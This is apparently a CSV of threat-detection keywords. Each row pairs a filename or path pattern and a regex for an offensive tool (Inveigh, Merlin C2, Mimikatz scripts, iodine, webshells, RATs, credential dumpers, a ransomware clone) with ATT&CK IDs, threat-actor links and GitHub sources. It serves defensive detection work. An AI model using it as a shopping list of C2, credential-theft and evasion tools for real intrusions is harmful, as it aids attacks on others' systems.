"*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15951"
"*\Inveigh-NTLMv1.txt*",".{0,1000}\\Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15952"
"*\Inveigh-NTLMv1.txt*",".{0,1000}\\Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15953"
"*\Inveigh-NTLMv2.txt*",".{0,1000}\\Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15954"
"*\Inveigh-NTLMv2.txt*",".{0,1000}\\Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15955"
"*\InventoryApplicationFile\revsocks_windows*",".{0,1000}\\InventoryApplicationFile\\revsocks_windows.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","15957"
"*\Invoke-ADEnum\*",".{0,1000}\\Invoke\-ADEnum\\.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","15964"
"*\Invoke-ADEnum-main*",".{0,1000}\\Invoke\-ADEnum\-main.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","15965"
"*\Invoke-ADSBackdoor.ps1*",".{0,1000}\\Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15966"
"*\Invoke-ArgFuscator-main*",".{0,1000}\\Invoke\-ArgFuscator\-main.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","15967"
"*\Invoke-Bypass.ps1*",".{0,1000}\\Invoke\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15968"
"*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","15969"
"*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15970"
"*\Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\\Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15971"
"*\Invoke-Dump.ps1*",".{0,1000}\\Invoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15972"
"*\Invoke-EternalBlue.ps1*",".{0,1000}\\Invoke\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15973"
"*\Invoke-ExcelMacroPivot.ps1*",".{0,1000}\\Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15974"
"*\Invoke-InternalMonologue.ps1*",".{0,1000}\\Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15975"
"*\Invoke-MDExclusionParser.ps1*",".{0,1000}\\Invoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","15977"
"*\Invoke-Mimikatz.ps1*",".{0,1000}\\Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15978"
"*\Invoke-mimikittenz.ps1*",".{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","15979"
"*\Invoke-MS16032.ps1*",".{0,1000}\\Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15980"
"*\Invoke-MS16-032.ps1*",".{0,1000}\\Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15981"
"*\Invoke-MS16135.ps1*",".{0,1000}\\Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15982"
"*\Invoke-Obfuscation*",".{0,1000}\\Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","15983"
"*\Invoke-PowerThIEf.ps1*",".{0,1000}\\Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15984"
"*\Invoke-PsUACme.ps1*",".{0,1000}\\Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15985"
"*\Invoke-Shellcode.ps1*",".{0,1000}\\Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15986"
"*\Invoke-SocksProxy\*",".{0,1000}\\Invoke\-SocksProxy\\.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","15987"
"*\Invoke-Stealth.ps1*",".{0,1000}\\Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","15988"
"*\InvokeWebRequestCommand.cs",".{0,1000}\\InvokeWebRequestCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15989"
"*\Invoke-WMILM.ps1*",".{0,1000}\\Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15990"
"*\InvokeWmiMethodCommand.cs",".{0,1000}\\InvokeWmiMethodCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15991"
"*\iodine-*-windows.zip*",".{0,1000}\\iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","15998"
"*\iodine.exe*",".{0,1000}\\iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","15999"
"*\iodine-master\*",".{0,1000}\\iodine\-master\\.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","16000"
"*\IOXIDResolver.py*",".{0,1000}\\IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16001"
"*\IPfuscation.cpp*",".{0,1000}\\IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","16002"
"*\IPfuscation.exe*",".{0,1000}\\IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","16003"
"*\IPPrintC2.ps1*",".{0,1000}\\IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","16004"
"*\Iraq RAT V.1.exe*",".{0,1000}\\Iraq\sRAT\sV\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16009"
"*\ironvest\getCredsironvest.h*",".{0,1000}\\ironvest\\getCredsironvest\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16010"
"*\irs.exe*",".{0,1000}\\irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","16011"
"*\iscsicpl_bypassUAC*",".{0,1000}\\iscsicpl_bypassUAC.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","16012"
"*\itRAT.exe*",".{0,1000}\\itRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16020"
"*\itsdangerous.zip*",".{0,1000}\\itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16021"
"*\itsecteam_shell.php*",".{0,1000}\\itsecteam_shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16022"
"*\Ivy\Cryptor*",".{0,1000}\\Ivy\\Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","16023"
"*\Ivy\Loader\*",".{0,1000}\\Ivy\\Loader\\.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","16024"
"*\jaccdpqnvbrrxlaf*","\\jaccdpqnvbrrxlaf.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","pipe names (sysmon EID 17 - 18)","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","16025"
"*\jackdaw.exe",".{0,1000}\\jackdaw\.exe","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","16026"
"*\jackdaw.zip",".{0,1000}\\jackdaw\.zip","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","16027"
"*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16028"
"*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16029"
